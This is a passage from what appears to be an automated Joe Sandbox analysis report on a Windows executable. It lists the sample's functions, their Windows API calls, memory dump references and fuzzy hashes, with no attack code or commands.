                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                      • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                      • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                      Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                      Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                      Function 703D2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(703D405C,00000004,00000040,703D404C), ref: 703D29B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 05c8fa7ab782af747f15f5bed91c5f8d40109f26461e3837ef64358adbf78216
                                                                      • Instruction ID: fccd065ce56525b20e976aad7a0047628d4986508826e4a284a0f210649b2480
                                                                      • Opcode Fuzzy Hash: 05c8fa7ab782af747f15f5bed91c5f8d40109f26461e3837ef64358adbf78216
                                                                      • Instruction Fuzzy Hash: 01F0A5F3905280DFE350CF7A9C44B05BBE8E359304B2285AAE3ADD6260E3B44444CF11
                                                                      Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                      • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                      Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                      • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                      • Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                      • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                      Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                      • Instruction ID: a51ecd0892fb275ea92473d319bbbc5ec4fc6164fb370921ec18ec876cc9dfbc
                                                                      • Opcode Fuzzy Hash: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                      • Instruction Fuzzy Hash: A6D05E73E142008BD750DBB8BA8945E73A8F781319320C83BE102F1191E97888524A2D
                                                                      Function 703D121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 4d3c0e9c581898afb5bfd6f41a5974a93566f0f8028e31bd0de923100abef8ff
                                                                      • Instruction ID: b583e39f5b15dc5b3bda74cf46100f72e3dc4f1e2aff842471bbedb9fbe40645
                                                                      • Opcode Fuzzy Hash: 4d3c0e9c581898afb5bfd6f41a5974a93566f0f8028e31bd0de923100abef8ff
                                                                      • Instruction Fuzzy Hash: 42B00276A44100DFFF40DB65CD46F35775CD744705F544050F706D5155D5649D148A35

                                                                      Non-executed Functions

                                                                      Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                      • GetClientRect.USER32(?,?), ref: 004054E8
                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                        • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                      • ShowWindow.USER32(00000000), ref: 00405637
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                      • ShowWindow.USER32(00000008), ref: 00405686
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                      • CreatePopupMenu.USER32 ref: 004056CB
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                      • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                      • OpenClipboard.USER32(00000000), ref: 00405760
                                                                      • EmptyClipboard.USER32 ref: 00405766
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                      • CloseClipboard.USER32 ref: 004057C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: {
                                                                      • API String ID: 590372296-366298937
                                                                      • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                      • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                      • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                      • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                      Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                      • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                        • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                        • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00403347,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                        • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                        • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                        • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
